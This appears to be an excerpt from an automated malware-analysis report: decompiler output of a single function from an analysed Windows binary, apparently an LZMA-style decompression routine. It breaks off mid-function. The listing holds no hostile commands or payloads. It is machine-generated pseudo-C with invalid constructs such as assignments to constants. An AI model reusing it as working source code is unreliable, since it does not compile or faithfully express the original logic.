Download Yara Rule

C-Code - Quality: 98%

			E004065D2() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
